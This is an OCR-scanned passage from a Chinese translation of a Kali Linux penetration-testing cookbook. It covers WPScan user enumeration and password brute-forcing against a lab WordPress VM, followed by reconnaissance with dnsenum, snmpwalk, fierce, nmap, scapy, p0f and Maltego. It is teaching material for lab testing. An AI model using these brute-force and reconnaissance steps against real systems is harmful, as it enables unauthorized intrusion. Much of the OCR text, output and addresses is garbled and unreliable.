130.6 MB to Amazon 53. Automatically Virginia (East USA) 100+ free server apps in the 
— — = restore servers from backups. Amazon EC2 cloud, 
64.9 MB Micro: $0,02/mour 
TU Test backups in tha cloud. Only a browser required. 


Total: 195.5 MB ($0.0 3/rna) 


Save time and money with 100+ ready-to-use solutions: discover and leverage the best Introducing TKLDy - 
free open source software. Deploy in minutes on bare metal, virtual machines, or in the : 
cloud. 


Tt just works: designed for ease of use, built and pre-tested by a community of experts. IBth Jul, 2013 
Turnk 


Backup and migration saves changes to files, databases and package 28th Jun, 2013 


management to encrypted storage which servers can be zutemabcally restored from. 

Secure and easy to maintain: auto-updsteg daily with latest security patches. 

100% Open Source: free from expensive and restrictive proprietary licensing. Easy tà 

customize and extend to build new appliances from the clasest existing starting point. 6th Jun, 2013 


用 上 


17th Jan, 2013 


"Lighter, smaller, faster and easier is 
the formula behind TurnKey Linux" 


— InfoWorld, Bossie awards (source) Follow us. Share with friends. 





2. 有 许多 应 用 在 这 里 列 出 ， 我 推荐 都 试 试 它们 ， 便 于 你 发 现 漏洞 并 提升 这 方面 的 技能 。 但 
是 ， 对 于 这 个 秘籍 ， 我 们 只 测试 WordPress。 在 Instant search 框 中 ， 输 


入 WordPress ° 
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第 三 草 高 级 测试 环境 





Etherpad Lite Joomla 7.5 Drupal 7 Zen Cart 


Real-time document Cutting Edge Content Content Management online store 
collaboration Management Framework management system 





XOOPS TomatoCart Typo3 PHP-Nuke 
Lontent Management Shopping cart Enterprise CMS Content Management 
and Web Application system 

Platform 








OGA Silverstripe Plone 
QA system Social publishing CAS CMS and framework Open Source Content 
Management 





 TURMKEV 
3. 在 WordPress FRR 0Y > 24% ISO 镜像 。 下 载 完 成 后 — “GR iS 
VirtualBox $54& P $9 48 83 : 
Blogging PHP Content management Ej subscribe 


WordPress - Blog Publishing Platform 


WordPress is a state-of-the-art publishing platform with a focus on 
aesthetics, web standards, and usability. It is one of the worlds most popular 
blog publishing applications, includes tons of powerful core functionality, 
extendable via literally hundreds of plugins, and supports full theming. 








P 


既然 我 们 加 载 的 WordPress 虚拟 机 ， 我 们 可 以 使 用 WPScan 来 攻击 它 了 。WPScan 是 
& 4] WordPress 安全 扫描 器 ， 允 许 用 户 发 现 WordPress 上 的 漏洞 。 


AME 


`N 
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WPScan 接受 多 种 和 参数， 包括 : 
e -u < 目标 域名 或 url» : 参数 u 允许 你 指定 目标 的 域名 。 
e -f :参数 和 人 允许 你 强制 检查 WordPress 是 否 安 装 。 
e  -e[ 选 项 ] : 参数 e 允许 你 设置 枚 举 。 


让 我 们 开始 使 用 WPScan。 





wpscan -h 


_| v2.0rNA 


WordPress security Scanner by the WPScan |eam 
Sponsored by the RandomStorm Open Source Initiative 


Help 


Some values are settable in conf/browser.conf.jison 


user-agent, proxy, proxy-auth, threads, cache timeout and request timeout 


--update Update to the Latest revision 


--url | -u «target url» The WordPress URL/domain to s 


rA 


--force | -f Forces WPScan to not check if the remote si 


--enumerate | -e [option(s)] Enumeration. 
option 


Li usernames from id 1 to 10 


is running 


WordPress. 





2. 让 我 们 对 WordPress 虚 拟 机 执行 基本 的 WPScan 测 试 。 这 里 ， 我 们 靶 机 的 I|P 地 址 


是 192.168.56.102 ° 


wpscan -u 192.168.56.102 


3， 现 在， 让 我 们 通过 执行 下 列 命 令 枚 举 用 户 名 列表 : 


wpscan -u 192.186.56.102 -e u vp 


2.0rNA 


; Security Scanner by the WPScan Team 
the HandomStorm Open Source Initiative 


| URL: http:, 


"IE 


| Started on Mon. ul 29 19:09:25 


Ihe WordP theme in use i: entytwelve vl.l 
The WordP i= tto://192. 58.5 b 162s readme Html file ex 
XML -RPC htto://1927.168 .56.162/xm 


= - zh 
wWordP re versio 3.5.1 identified from meta generator. 


Enumerating plugins from passive detection 
No plugins found :1 


Enumerating usernames 
we found the following | username/s 


1 | name: admin | nickname: admin | Turnkey Linux 





最 后 ， 我 们 通过 使 用 -wordList < 文件 路 径 > 选项 来 提供 单词 列表 : 


wpscan -u 192.168.56.102 -e u --wordlist /root/wordlist.txt 


页 面 会 像 下 面 这 样 : 


| v2.0rNA 


WordPress Security Scanner by the WPScan Team 
ponsored by the RandomStorm Open Source Initiative 


URL: http://192.168.56. 
Started on Mon Jul 

wentytwelve vl. 
.56.102//readme .h 


The 
The 


ie 
p: 
EY 
4. 


Enumerating plugins from passive detection 


plugins found :{ 
Enumerating usernames 

We found the following 1 username/s 

id: 1 | name: admin | nickname: admin | lurnKey Linux 


Starting the password brute forcer 


Brute forcing user 'admin' with 4 passwords... 100% complete. 
Username : admin Password : passwordl?23 





5. 这 就 结束 了 。 我 们 已 经 成 功 获 取 了 WordPress 的 密码 。 


第 四 草 信息 收集 


作者 : Willie L. Pritchett, David De Smet 
译 者 : 飞龙 


tit : CC BY-NC-SA 4.0 
KA 
简介 


攻击 的 重要 阶段 之 一 就 是 信息 收集 。 为 了 能 够 实施 攻击 ， 我 们 需要 收集 关于 目标 的 基本 信 
息 。 我 们 获得 的 信息 越 多 ， 攻 击 成 功 的 概率 就 越 高 。 


我 也 强调 这 一 阶段 的 一 个 重要 方面 ， 它 就 是 记录 。 在 编写 这 本 书 的 时 候 ， 也 新 的 Kali 发 行 版 包 
含 了 一 组 工具 用 于 帮助 我 们 核对 和 组 织 来 自 目标 的 数据 ， 以 便 我 们 更 好 地 侦查 目标 。 类 似 
Maltego CaseFile 和 KeepNote 的 工具 就 是 一 个 例子 。 


4.1 服务 枚 举 


在 这 个 秘籍 中 ， 我 们 将 会 展示 一 些 服 务 枚 举 的 小 技巧 。 枚 举 是 我 们 从 网 络 收集 信息 的 过 程 。 
我 们 将 要 研究 DNS 枚 举 和 SNMP 枚 举 技术 。DNS 枚 举 是 定位 茶 个 组 织 的 所 有 DNS 服务 绒 和 
DNS 条 目的 过 程 。DNS 枚 举 允许 我 们 收集 有 关 该 组 织 的 重要 信息 ， 例 如 用 户 名 、 计 算 机 名 

称 、IP 地 址 以 及 其 它 。 为 了 完成 这 些 任务 我 们 会 使 用 DNSenum。 对 于 SNMP 枚 举 ， 我 们 会 使 
用 叫做 SnmpEnum 的 工具 ， 它 是 一 个 强大 的 SNMP 枚 举 工 具 ， 允 许 我 们 分 析 网 络 上 的 SNMP 


A 量 i 
TRE y TR 


让 我 们 以 DNS 枚 举 作 为 开始 : 
1， 我 们 使 用 DNSenum 进 行 DNS 枚 举 。 为 了 开始 DNS 枚 举 ， 打 开 Gnome 终 端 ， 并 且 输 入 以 


Te: 


cd /usr/bin 
./dnsenum --enum adomainnameontheinternet.com 


请 不 要 在 不 属于 你 的 公共 网 站 或 者 不 是 你 自己 的 服务 器 上 运行 这 个 工具 。 这 里 我 们 
将 adomainnameontheinternet.com 作为 一 个 例子 , 你 应 该 替换 掉 这 个 目 AR x 要 当 心 | 


2. 我 们 需要 获取 信息 输出 ， 例 如 主机 、 名 称 服务 器 、 邮 件 服务 器 ， 如 果 幸 运 的 话 还 可 以 得 
到 区 域 转换 : 


root@kali:-# dnsenum aan ee om 
dnsenum.pl VERSION:1.2 
Warning: can't load TIERE module, whois queries disabled. 


[p —Q Com 14460 
Name Servers: 


ns3.dreamhost.com 36) A mm 816.716 
nsz.dreamhost.com /883 A 209 eee 
nsl.dreamhost.com 32. A meme 705.706 


Mail (MX) Servers: 


ALT1.ASPMX.L.GOQOGLE.com 
Al T2. ASPMX .| .GOOGI F.com 
ASPMX2.G00GLEMAIL .com 
GOODGLEMAIL .com 
X4 .GOOGLEMAIL .com 
ASPMX5.GOOGLEMAIL .com 
ASPMX.L.GOOGLE.com 


EAP i 2 
173.194.74.27 
74.1299 8 mii 
173 sme . 27 
74 amp 7 


I OI 


Si I I 


> 


Trying Zone Transfers and getting Bind Versions: 





我 们 可 以 使 用 一 些 额 外 的 选项 来 运行 DNSenum， 它 们 包括 这 些 东 西 : 


B-A 


o -- threads [number |] 允许 你 设置 一 次 所 运行 的 线程 数量 。 


o -r 允许 你 开启 递归 查找 。 

o -d 允许 你 设置 在 WHOIS 请 求 之 间 的 时 间 延 迟 ， 单 位 为 秒 。 
o -o 允许 我 们 制定 输出 位 置 。 

O -w penes APR 


请 见 WHOIS 的 维基 百科 。 





pT 


我 们 可 以 使 用 另 一 个 命令 snmpwalk 来 检测 Windows 主 机 。 id 
GETNEXT 请 求 在 网 络 实体 中 查询 信息 树 的 SNMP 应 用 。 在 命令 行 中 键入 下 列 命 


snmpwalk -c public 192.168.10.200 -v 2c 


我 们 也 可 以 枚 举 安 装 的 软件 : 


snmpwalk -c public 192.168.10.200 -v 1 | grep hrSWInstalledName 


HOST RESOURCES -MIB::hrSWInstalledName.1 STRING: "VMware Tools" 
HOST-RESOURCES-MIB::hrSWInstalledName.2 - STRING: "WebFldrs" 


以 及 使 用 相同 工具 枚 举 开 放 的 TCP 端 口 : 


snmpwalk -c public 192.168.10.200 -v 1 | grep tcpConnState | cut -d"." -f6 | sort 
-nu 


7， 另 一 个 通过 SNMP 收 集 信息 的 工具 叫做 snmpcheck 


cd /usr/bin 
snmpcheck -t 192.168.10.200 


8 为 了 使 用 fierce (一 个 尝试 多 种 技术 来 寻找 所 有 目标 所 用 的 IP 地 址 和 域名 的 工具 ) 进行 域 
名 扫描 ， 我 们 可 以 键入 以 下 命令 


cd /usr/bin 
fierce -dns adomainnameontheinternet.com 


请 不 要 在 不 属于 你 的 公共 网 站 或 者 不 是 你 目 己 的 服务 器 上 运行 这 个 工具 。 这 里 我 们 
将 adomainnameontheinternet.com 作为 一 个 例子 ， 你 应 应 该 交替 换 掉 这 个 目标 。 要 当心 | 


9. 为 了 以 指定 的 词语 列表 进行 相同 的 操作 ， 键 入 以 下 命令 : 


fierce -dns adomainnameontheinternet.com -wordlist hosts.txt -file /tmp/output.tx 
t 


10. 为 了 在 SMTP 服 务 器 上 启动 用 户 的 SMTP 枚 举 ， 键 入 以 下 命令 


smtp-user-enum -M VRFY -U /tmp/users.txt -t 192.168.10.200 


， 我 们 现在 可 以 记录 所 获得 的 结果 了 。 


4.2 F) BT 2 i 


使 用 上 一 节 中 我 们 所 收集 的 信息 ， 我 们 就 能 着 上 限于 判断 目标 网 络 的 I|P 地 址 范围 。 在 这 个 秘籍 
中 我 们 将 要 探索 完成 它 所 用 的 工具 。 


IRAE p TK 
让 我 们 通过 打开 终端 窗口 来 开始 判断 网 络 范围 : 
1， 打 开 新 的 终端 窗口 ， 并 且 键 入 以 下 命令 


dmitry -wnspb targethost.com -0 /root/Desktop/dmitry-result 


2. 完成 之 后 ， 我 们 应 该 在 昌 面 上 得 到 了 一 个 文本 文件 ， 名 称 为 dmitry-result.txt * SAK 
集 到 的 目标 信息 : 


| *dmitry-result.txt 3€ 
Gathered Netcraft information for targethost.com [a 





Retrieving Netcraft.com information for targethost.com 
Netcraft.com Information gathered 


Gathered Subdomain information for targethost.com 


Searching Gocgle.com:88. 

[HostName : community. targethost. com 

HostIP:192.168.10.201 

HostName :www.targethost.com 

HostIP:192.168.196 .266 

HostName:smtp.targethost.com 

HostIP:192.168.18.206 

HostName:ftp.targethost.com 

HostIP:192.168.18.218 

HostName:private.targethost.com 

HostIP:192.168.10. 208] 

Searching Altavista.com:88. 

Found 4 possible subdomain(s) for host isoftdev.eu, Searched 0 pages | 
[containing 8 results 7 


3. 键入 以 下 命令 来 执行 ICMP netmask 请 求 : 
netmask -s targethost.com 

4. 使 用 scapy， 我 们 就 可 以 执行 并 行路 由 跟踪 。 键 入 以 下 命令 来 司 动 它 : 
scapy 


5，Scapy 司 动 之 后 ， 我 们 现在 可 以 输入 以 下 函数 : 


ans, unans=sr (IP(dst="www.targethost.com/30", ttl-(1,6))/TCP() 


6， 我 们 可 以 输入 以 下 函数 来 将 结果 展示 为 表格 : 


ans.make_table( lambda (s,r): (s.dst, s.ttl, r.src) ) 


结 采 如 下 


人 
OU 
el Sel 


216.27.130.162 216.27.130.163 216.27.130.164 216.27.130.165 
1 192.168.10.1 192.168.10.1 192.168.10.1 192.168.10.1 

2 51.37.219.254 51 27-2419. 254 51.37:219.254 51.3/:219.254 
3 223.243.4.254 223.243.4.254 223.243.4.254 223.243.4.254 
4 223.243.2.6 223.243.2.6 223.243.2.6 223.243.2.6 

5 192.251.254.1 192.251.251.80 192.251.254.1 192.251.251.80 


7. RERA NAT BR RE A scapy RAF TCPH th Ez 3k 


res, unans=traceroute(["www.google.com", "www.Kali- linux.org", "www.targethost.com" | 
,dport=[80, 443],maxttl=20, retry=-2) 


8 我们 只 需要 键入 以 下 函数 来 将 结果 展示 为 图 片 : 


res.grapnh() 


AS&151 
[UniNct] 





5169 "T 137 
[GOOGLE - Google Inc.] * [BIZNESSHOSTING - VOLIC CO. ~ TAMAZON: Dr Amazon com. Inc. | 


9 保存 图 片 只 需要 下 列 命令 : 


res.graph(target="> /tmp/graph.svg" ) 


10， 我 们 可 以 生成 3D 展 示 的 图 片 ， 通 过 键入 下 列 函数 来 实现 : 


res.trace3D() 


11. 键入 以 下 命令 来 退出 Scapy : 


exit() 
12. 在 获得 结果 之 后 ， 我 们 现在 可 以 对 其 做 记录 。 


工作 原理 


在 步骤 1 中 ， 我 们 使 用 了 dmitry 来 获取 目标 信息 。 参 数 -wnspub 允许 我 们 在 域名 上 执行 
WHOIS 查 询 ， 检 索 Netcraft.com 的 信息 ， 搜 索 可 能 的 子 域 名 ， 以 及 扫描 TCP 端 口 。 选 

项 -o 允许 我 们 将 结果 保存 到 文本 文件 中 。 在 步骤 3 中 ， 我 们 建立 了 一 个 简单 的 ICMP netmask 
TR? PA -s 选项 ， 来 输出 IP 地 址 和 子 网 掩 码 。 接 下 来 ， 我 们 使 用 scapy 来 执行 目标 上 的 并 
行路 由 跟踪 ， 并 在 表格 中 展示 结果 。 在 步骤 7 中 ， 我 们 在 不 同 主机 的 80 和 443 端 口上 执行 了 


TCP 路 由 跟踪 ， 并 且 将 最 大 TTL 设 置 为 20 来 停止 这 个 过 程 。 在 获得 结果 之 后 ， 我 们 创建 了 它 的 
图 片 表 示 ， 将 它 保 存 到 临时 目录 中 ， 同 时 创建 了 相同 结果 的 3D 表 示 。 最 后 ， 我 们 退出 了 
SCapy ° 


4.3 识别 活动 主机 
在 尝试 涂 透 之 前 ， 我 们 首先 需要 识别 目标 网 络 范 围 内 的 活动 主机 。 


一 个 简单 的 方法 就 是 对 目标 网 络 执 行 ping 操作 。 当 然 ， 这 可 以 被 主机 拒绝 或 忽略 ， 这 不 是 我 
们 希望 的 。 


操作 步骤 
让 我 们 打开 终端 窗口 ， 开 始 定 位 活动 主机 : 


1. 我 们 可 以 使 用 Nmap 来 判断 某 个 主机 是 否 打 开 或 关闭 ， 像 下 面 这 样 : 


nmap -SP 216.27.130.162 


Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-04-27 23:30 CDT 
Nmap scan report for test-target.net (216.27.130.162) 

Host is up (0.00058s latency). 

Nmap done: 1 IP address (1 host up) scanned in 0.06 seconds 


2， 我 们 也 可 以 使 用 Nping (Nmap 组 件 ) ， 它 提供 给 我 们 更 详细 的 结果 : 


nping --echo-client "public" echo.nmap.org 


:-/usr/bin# nping --echo-client "public" echo.nmap.org 


Starting Nping 0.6.25 ( http://nmap.org/nping ) at 2013-06-05 17:07 EDT 

(1.3565s) ICMP 10.0.2.15 = /4.20/.244.221 Echo request (type-8/code-0) ttl-64 id-26256 iplen-28 

(1.436988) ICMP 74.280/.244.221 > 10.0.2.15 Echo reply (type=0/code=0) ttl-51 id-13311 iplen-28 

(2.35/1s) ICMP 10.0.2.15 = /4.20/.244.221 Echo request (type-8/code-0) ttl-64 id-26256 iplen-28 

(2.4369s) ICMP 74.207/.244.221 > 10.0.2.15 Echo reply [(type-O0/code-80) ttl-51 id-13312 iplen-28 
.3b/1s) ICMP 10.0.2.15 = /4.20/7.244.221 Echo request (type-8/code-0) ttl-64 id-26256 iplen-28 

(3.4375s) ICMP /4.207/.244.22]1 > 18.8.2.15 Echo reply (type-80/code-0) ttl-51 id-13313 iplen=28 

【 .3575S) ICMP 10. .15 > 74.207 .244.221 Echo request (type-8/code-0) ttl-64 id=26256 iplen-28 

(4.4398s) ICMP 74 244.221 > 10.0.2.15 Echo reply (type-O/code-0) ttl-51 id-13314 iplen-28 

(5 .3579s) ICMP 10.0.2.15 > /4.20/.244.221 Echo request (type-S/code-0) ttl=64 id-26256 iplen-28 

(5.4396s) ICMP /4.280/.244.22] > 10.0.2.15 Echo reply (type=0/code=0) ttl-51 id-13315 iplen=28 


Max rtt: 82.086ms | Min rtt: 79.769ms | Avg rtt: 80./93ms 
Raw packets sent: 5 (140B) | Revd: 5 (230B) | Lost: © (0.00%)| Echoed: © (0B) 
.00238s | Tx bytes/s: 34.9 x pkts/s: 1.25 
: 9.00290s | Rx bytes/s: 45.97 
Nping done: 1 IP address pinged in 6. 





3. 我们 也 可 以 向 指定 端口 发 送 一 些 十 六 进 制 数据 : 


nping -tcp -p 445 -data AF56A43D 216.27.130.162 


4.4 FRA 3X3 V 


在 了 解 目标 网 络 范 围 和 活动 主机 之 后 ， 我 们 需要 执行 端口 扫描 操作 来 检索 开放 的 TCP 和 UDP 
端口 和 接 入 点 。 


完成 这 个 秘籍 需要 启动 Apache Web/R4 & o 


操作 步骤 
让 我 们 通过 打开 终端 窗口 始 寻 找 开 放 端 口 


1. 运行 终 端 窗口 并 输入 下 列 命令 作为 开始 : 


nmap 192.168.56.101 


root@Wali:~# nmap 192.168.56.1681 


starting Nmap 6.25 ( http://nmap.org ) at 2013-06-05 

Nmap scan report for 192.168.56.101 

Host is up (0.00048s Latency). 

Not shown: 977 
STATE 


open 
open 
open 
open 
open 
open 
open 
cp open 
cp open 
) open 

| open 
open 
open 

) open 

) open 
cp open 
open 


Nmap done: 1 IP address (1 host up) scanned in 1.4/ seconds 


root@kali:~# B 


我 们 也 可 以 显 式 指定 要 扫描 的 端口 (这 里 我 们 指定 了 1000 个 端口 ) 


closed ports 
SERVICE 

ftp 

ssh 

telnet 

smtp 

domain 

http 
rpcbind 
netbios-ssn 
microsoft -ds 
axac 

Login 

she ll 
rmiregistry 
ingreslock 
nts 
ccproxy-ftp 
mysql 
postgresql 
vnc 

X11 

irc 

ajpl3 
unknown 





nmap -p 1-1000 192.168.56.101 


root@kali:/usr/bin# nmap -p 1-1000 192.168.56.101 


starting Nmap 6.25 ( http://nmap.org ) at 2013-06-05 22:2/ EDT 
Nmap scan report for 192.168.56.101 
Host is up (@.00045s Latency). 
Not shown: 988 closed ports 
STATE SERVICE 
open ftp 
open ssh 
open telnet 
open smtp 
open domain 
open http 
open  rpcbind 
138/tcp open netbios-ssn 
445/tcp open microsoft -ds 
5l2/tcp open exec 
513/tcp open Login 
514/tcp open shell 
MAC Address: 08:080:2/:5D:5/:68 (Cadmus Computer Systems) 


Nmap done: 1 IP address (1 host up) scanned in 1.31 seconds 
rootükali:/usr/bin£ Jj 





或 指定 Nmap 来 扫描 某 个 组 织 所 有 网 络 的 TCP 22 端 口 : 


nmap -p 22 192.168.56.* 


root@kali:/usr/bin# nmap -p 22 192.168.56.* 


starting Nmap 6.25 ( http://nmap.org ) at 2013-06-05 22:28 EDT 
Nmap scan report for 192.168.56.1 

Host is up (0.00084s latency). 

PORT STATE SERVICE 

272/tcp filtered ssh 

MAC Address: 08:00:2/:00:20:0C2 (Cadmus Computer Systems) 


Nmap scan report for 192.166.56.100 
2ls Latency). 
PORT STATE SERVICE 
22/tcp filtered ssh 
MAC Address: 08:00:2/:57:/8:CE (Cadmus Computer Systems) 


Nmap scan report for 192.168.56.101 

Host is up (0.00054s latency). 

PORT STATE SERVICE 

22/tcp open ssh 

MAC Address: 08:080:2/:5D:5/:698 (Cadmus Computer Systems) 
Nmap scan report for 192.168.56.102 

Host is up (0.000068s latency). 

PORT STATE SERVICE 


22/tcp closed ssh 





Nmap done: 256 IP addresses (4 hosts up) scanned in 10.13 seconds 
4. 或 者 以 特定 格式 输出 结果 : 


nmap -p 22 192.168.10.* -oG /tmp/nmap-targethost-tcp445.tx 


工作 原理 
这 个 秘籍 中 ， 我 们 使 用 Nmap 来 扫描 我 们 网 络 上 的 目标 主机 ， 并 判断 开放 了 哪个 端口 。 


P 


Nmap 的 GUI 版 本 叫做 Zenmap， 它 可 以 通过 在 终端 上 执行 zenmap 命令 ， 或 者 访 


le] Applications | Kali Linux | Information Gathering | Network Scanners | zenmap 来 后 动 。 


* Zenmap 


Scan Tools Profile Help 


Target: | Im Profile: Intense scan |v | | Scan | | Cance 


Command: [nmap T4-Av 

















| Hosts | Services | | Nmap Output | Ports / Hosts Topology Host Details Scans 


| 


OS Host v | v | |Deta s| 














| Filter Hosts | 


4.5 操作 系统 指纹 识别 


到 信息 收集 的 这 个 步骤 ， 我 们 应 该 记录 了 一 些 IP 地 址 ， 活 动 主机 ， 以 及 所 识别 的 目标 组 织 的 
开放 端口 。 下 一 步 就 是 判断 活动 主机 上 运行 的 操作 系统 ， 以 便 了 解 我 们 所 渗透 的 系统 类 型 。 


准备 
需要 用 到 Wireshark 捕 获 文 件 来 完成 这 个 秘籍 的 步骤 2 © 
操作 步骤 


让 我 们 在 终端 慷 口 中 进行 OS 指 纹 识 别 : 


1， 我 们 可 以 使 用 Nmap 执 行 下 列 命 令 ， 带 有 -0 


> 


令 来 开启 OS 检测 功能 : 


nmap -O 192.168.56.102 


root@kali:-# nmap -0 192.168.56.102 


starting Nmap 6.25 ( http://nmap.org ) at 2013-09-01 21:00 EDT 
Nmap scan report for 192.168.56.102 
latency). 
Not shown: 977 closed ports 
STATE SERVICE 
open ftp 
open ssh 
open telnet 
open smtp 
open domain 
open http 
open  rpcbind 
open netbios-ssn 
open microsoftt-ds 
open exec 
open Login 
open shell 
cp open  rmiregistry 
cp open ingreslock 
/tcp open nfs 
2 open ccproxy-ftp 
cp open mysql 
cp open postgresgl 
jJ/tcp open  vnc 
50080/tcp open Xll 
666//tcp open irc 
80089/tcp open ajpls 
J/tcp open unknown 





2. 使 用 pot 来 分 析 Wireshark 捕 获 文件 : 


pof -s /tmp/targethost.pcap -o pOf-result.log -1 

pof - passive os fingerprinting utility, version 2.0.8 
(C) M. Zalewski <lcamtuf@dione.cc>, W. Stearns 
<wstearns@pobox.com> 


pof: listening (SYN) on 'targethost.pcap', 230 sigs (16 generic), rule: ‘all'. 
[+] End of input file. 


4.6 服务 指纹 识别 


判断 运行 在 特定 端口 上 的 服务 是 目标 网 络 上 成 功 渗透 的 保障 。 它 也 会 排除 任何 由 OS 指纹 之 别 
产生 的 疑惑 。 


让 我 们 通过 开始 终端 贸 口 来 进行 服务 指 级 识别 : 
开 下 


nmap -sV 192.168.10.200 


Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-03-28 05:10 CDT 
Interesting ports on 192.168.10.200: 

Not shown: 1665 closed ports 

PORT STATE SERVICE VERSION 

21/tcp open ftp Microsoft ftpd 5.0 

25/tcp open smtp Microsoft ESMTP 5.0.2195.6713 

80/tcp open http Microsoft IIS webserver 5.0 

119/tcp open nntp Microsoft NNTP Service 5.0.2195.6702 (posting ok) 
135/tcp open msrpc Microsoft Windows RPC 

139/tcp open netbios-ssn 

443/tcp open https? 

445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds 
1025/tcp open mstask Microsoft mstask 

1026/tcp open msrpc Microsoft Windows RPC 

1027/tcp open msrpc Microsoft Windows RPC 

1755/tcp open wms? 

3372/tcp open msdtc? 

6666/tcp open nsunicast Microsoft Windows Media Unicast Service (nsum.exe) 


MAC Address: 00:50:56:C6:00:01 (VMware) 
Service Info: Host: DC; OS: Windows 


Nmap finished: 1 IP address (1 host up) scanned in 63.311 seconds 


2， 我 们 也 可 以 使 用 amap iR DAITE Ar XE SU 3X 9 BL 8g ER] > rade F dix AI : 


amap -bq 192.168.10.200 200-300 

amap v5.4 (www.thc.org/thc-amap) started at 2012-03-28 06:05:30 - MAPPING mode 
Protocol on 127.0.0.1:212/tcp matches ssh - banner: SSH-2.0- OpenSSH_3.9p1\n 
Protocol on 127.0.0.1:212/tcp matches ssh-openssh - banner:  SSH-2.0-OpenSSH 3.9p1 


^n 
amap v5.0 finished at 2005-07-14 23:02:11 


4.7 Maltego 风险 评估 


在 这 个 秘籍 中 ， 我 们 将 要 开始 使 用 Maltego 的 特殊 Kali 版 本 ， 它 可 以 在 信息 收集 阶段 协助 我 

们 ， 通 过 将 获得 的 信息 以 多 于 理解 的 形式 展示 。Maltego 是 开源 的 风险 评估 工具 ， 被 设计 用 来 
演示 网 络 上 故障 单 点 的 复杂 性 和 严重 性 。 它 也 具有 从 内 部 和 外 部 来 源 聚 合 信息 来 提供 简洁 的 
风险 图 表 的 能 力 。 


准备 
需要 一 个 账号 来 使 用 Maltego。 访 问 https://www.paterva.com/web6/community/ 来 注册 账号 。 
TRE Ty HR 


让 我 们 从 局 动 Maltego 开 始 : 


1. 访问 Applications | Kali Linux | Information Gathering | OSINT Analysis | maltego 来 
局 动 Maltego。 窗 口 如 下 : 








Bb eo. Maltego Kali Linux Edition 3.3.0 
LA Investigate Manage Organize 
| 区 1 py Number af Results ra E ^ 
| | ^ Oe oe w ! i —— 
| Paste Clear — 
| Al e Delet Welcome to Maltego! 


: - Steps Startup wizard - Welcome (1 of 5) 
E Start Page x Se 
Welcome - 
Login Welcome to Maltego! 
Lagin result 
pr transform seeds This wizard will quide you through the steps of setting up your 

pda Fe tran sforms Maltego Client for first use. 


B Recent Graphs 


We hope that you enjoy using our product as much as we enjoy 
building it! 


Ween Sw 


Please note that the Community Edition is intended for 
non-commercial use only! 


ALTEGO RADIUM CE 
ALI LINUX 








| ill cease | I | 
Bacl | Next = | Finish | Cancel | Heli 








Show on Startup 





2， 点 击 开始 向 导 的 Next 来 查看 登录 细节 : 


EG Ea: 


Investigate Manage Organize 


K Í . Copy Number af Results i£ 
J Wess g 


à u IE. a l 
| Paste Clear ^ races —— À— = 
| Welcome to Maltego! 


NG 


| Steps Startup wizard - Login (2 of 5) 


rE ml 
4 Start Page = Ed Enter your details below to login to the Maltego Community Server 
| Login 


Recent Graphs | " Te Or if you have not done so yet, register here 


Select transform seeds 
Update transforms Login 


m s * Email Address | 
Password | 


and E 


* Solve captcha | | 


ALTEGO RADIUM CE 
ALI LINUK 


—" B L [ n | 
Finish | Cancel | Help 


Show on Startup 





3， 点 击 Next 来 验证 我 们 的 登录 赁 证。 验证 之 后 ， 点 击 Next 以 继续 : 


4. 选择 transform seed Æ > ŽE At Next : 


Maltego Kali Linux Edition 3.3.0 


ey 
Paste Clear 4 ^y: li Px TWalcome to Maltego! 


Steps Startup wizard - Select transform seeds (4 of 5) 


- Start Page x . Welcome 


Recent Graphs . Login Discover transforms from: 


Login result s 
Select transfarm seeds Maltego public servers 


t - : 
Ud: Tq. |_| Local TAS (Transform Application Server) 


Note: The transform seed settings can be changed later through Manage->Discover 
Transforms. 
ALTEGO RADIUM CE 
ALI LINUX 





Show on Startup 





5. 这 个 向 导 在 跳 到 下 个 页 面 之 前 会 执行 多 次 操作 。 完 成 之 后 ， 选 


择 Open a blank graph and let me play around 并 点 击 Finish ° 


Maltego Kali Linux Edition 3.3.0 


Number of Results 


Steps Startup wizard - Update transforms (5 of 5) 


Welcome 

Login Congratulations! 
Login result 

Select transform seeds 


ae transforms 
gat a i 


ne oo 


Your new Maltego client has been initialized sucessfully! 


3 new application server(s) were found 
139 new transforms were found 
76 new entities were installed 


You are now ready to use Maltego! 


® Open a blank graph and let me play around 


(J Open an example graph 


(J Go away, | have done this before! 


ALTEGO RADIUM CE 
ALI LINUK 



































6. 也 开始 ， 将 Domain 实体 从 Palette 组 件 拖 放 到 New Graph 标签 页 中 。 


8. 


Manage Organize 


Quick | Entity 


Selection 


"à Start Page * 35 New Graph (1) * x 


|E] Palette 
y AS 


An internet 


(«x 





Main View | Bubble View | Entity List 





bs BOF Gr Detail View 


amall] 





DNS Name 


Domain Narr 


— Domain 
An internet d 


iPv4 Addre 


An IP versior 
MX Record 


A DNS mail « 


NS Record 


A DNS name 


"n Netblock 


E] 


= 


paterva.com 


An internet 4 
— URL 
An internet t 


ka 
Es Website 
s An internet 


© Locations 


[3 Output 


© Penetra... 
© Personal 


© Social N... 


的 Domain Name 属性 


', Start Page * EE New Graph (1) * x 


Main View | Bubble View | Entity List | || FI 


I 


Output 


目标 一 旦 设置 好 ， 我 们 就 可 以 开始 收集 信息 


e 


«no selection» 


= Property View 


«No Properties> 


通过 点 击 创建 的 Domain 实体 来 设置 目标 域名 ， 并 且 编 辑 Property view 中 


A Po Detail View 


Qi 


|» x 


ZA Dornain 


maltego.D ornain 


paterva.com 


MaSIAISAQ C! 


| /—P  3.jVD Á€"H 


= Property View 
@ Properties 
Type 
(Domain Name 
WHOIS Info 

& Graph info 
Weight 

Incaming links 


|» x 


paterva.com [ev 


LJ 


Outgoing links 
Bookmark 


je 最 开始 , 右键 点 击 创建 的 Domain 实体 d 


JE EL35 4€ Run Transform 来 显示 可 用 的 选项 : 


AaluaAO Ü 








NO 


z Start Page x J^ Example Graph (1) x BE Hew Graph i " x "mm = E 


" MainView | Bubble View | Entity List | | | ATA 































| RunTransform >» All Transforms : 
| | , Copy to New Graph + DNS from Domain b 
| Domain owner detail b 
b 
b 








Merge Email addresses from Domain 
Clear/Refresh Images | Files and Documents from Domain 






Attach Other transforms 
Type Actions H All transforms 





Copy 
Copy (as List) 
Cut 


Delete 


9. 我们 可 以 选择 查找 DNS 名 称 ， 执 行 WHOIS 查 询 ， 获 得 邮件 地 址 ， 以 及 其 它 。 或 者 我 们 还 
可 以 选择 运行 下 面 展示 的 全 部 转换 。 


^, Start Page x Ñ New Graph (1) * x 


Main View | Bubble View Entity List | | & Qm on p: RE: 











f 


info@targethost.com , 
l us 
m ns-2525.dns-49.co.uk 
www.targethost.com 

